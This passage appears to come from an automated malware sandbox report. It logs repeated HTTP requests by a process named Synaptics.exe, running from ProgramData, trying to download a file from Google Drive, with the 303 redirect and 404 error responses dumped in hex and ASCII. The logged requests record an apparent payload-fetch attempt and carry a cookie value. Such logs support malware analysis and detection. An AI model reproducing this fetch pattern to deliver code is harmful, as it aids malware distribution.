                                                                                                                                                        2024-12-30 10:48:43 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 66 70 53 7a 51 73 76 58 78 61 54 4f 6c 39 58 61 35 66 6b 34 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="RfpSzQsvXxaTOl9Xa5fk4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:43 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        121192.168.2.750155142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:43 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tThw2ME6UD3Rw6L0fdOXrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        122192.168.2.750161142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--P4GJN00ak5uBxg75MrFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        123192.168.2.750163142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:44 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-D9wiKbpPYTt6wI7UD6I90Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        124192.168.2.750162142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC569B1XNmoQykBBpUly-xZbI5bAdpsvBpv6PgUWT2ycaF0Q5ES2QxAaK7gzRT0uy8LC
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2JlnM_k27-4eIZlmvEu4jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:45 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:45 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 77 4a 6b 78 4f 36 67 65 6e 78 31 68 73 67 6d 64 74 33 42 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="twJkxO6genx1hsgmdt3BAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:45 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        125192.168.2.750166142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:45 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qdsWXjTXp7K8A7dcvdqvHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        126192.168.2.750167142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:45 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6uQbRvQ_mArwzefTphklp4EikxjvR0vxCd2mY3cSX6sabwbDpr0YLTXuj4VffFgxhIgH71Ztk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uicQ30HIpBqie7gxRO_Qpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 41 6b 4e 66 78 2d 4a 65 66 37 35 30 4a 44 34 6b 55 4e 5f 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="8AkNfx-Jef750JD4kUN_Tg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        127192.168.2.750168142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:45 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MOoFktRPLtyMWS1BMLSBPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        128192.168.2.750169142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:45 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6PbHKft8ZQ3k_t87-dXBjrDxPHqOcxrAooUmNxwKYel9IiuUJQxKxs_5NMWq-ytNB1cEwBIvY
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
